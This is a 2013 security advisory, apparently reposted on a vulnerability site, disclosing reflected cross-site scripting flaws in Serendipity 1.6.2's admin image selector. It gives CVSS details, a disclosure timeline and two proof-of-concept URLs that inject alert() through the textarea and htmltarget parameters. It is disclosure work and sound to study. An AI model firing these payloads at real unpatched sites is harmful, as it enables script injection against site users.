Serendipity XSS Vulnerabilities

2013-07-12 / 2013-08-21
Credit: Omar Kurt
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Information -------------------- Name : XSS Vulnerabilities in Serendipity Software : Serendipity 1.6.2 and possibly below. Vendor Homepage : http://www.s9y.org/ Vulnerability Type : Cross-Site Scripting Severity : Medium Researcher : Omar Kurt Advisory Reference : NS-13-003 Description -------------------- Serendipity is a PHP-powered weblog application which gives the user an easy way to maintain an online diary, weblog or even a complete homepage. While the default package is designed for the casual blogger, Serendipity offers a flexible, expandable and easy-to-use framework with the power for professional applications. Details -------------------- Serendipity is affected by XSS vulnerabilities in version 1.6.2. http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 You can read the full article about Cross-Site Scripting from here : http://www.mavitunasecurity.com/crosssite-scripting-xss/ Solution -------------------- The vendor fixed this vulnerability in the new version. Please see the references. Advisory Timeline -------------------- 26/02/2013 - First contact 04/03/2013 - Sent the details 10/07/2013 - Advisory released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References -------------------- Vendor Url / Patch : - MSL Advisory Link : https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker&#174; can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, <advisories () mavitunasecurity com> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

References:

http://www.s9y.org/
http://www.mavitunasecurity.com/netsparker-advisories/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top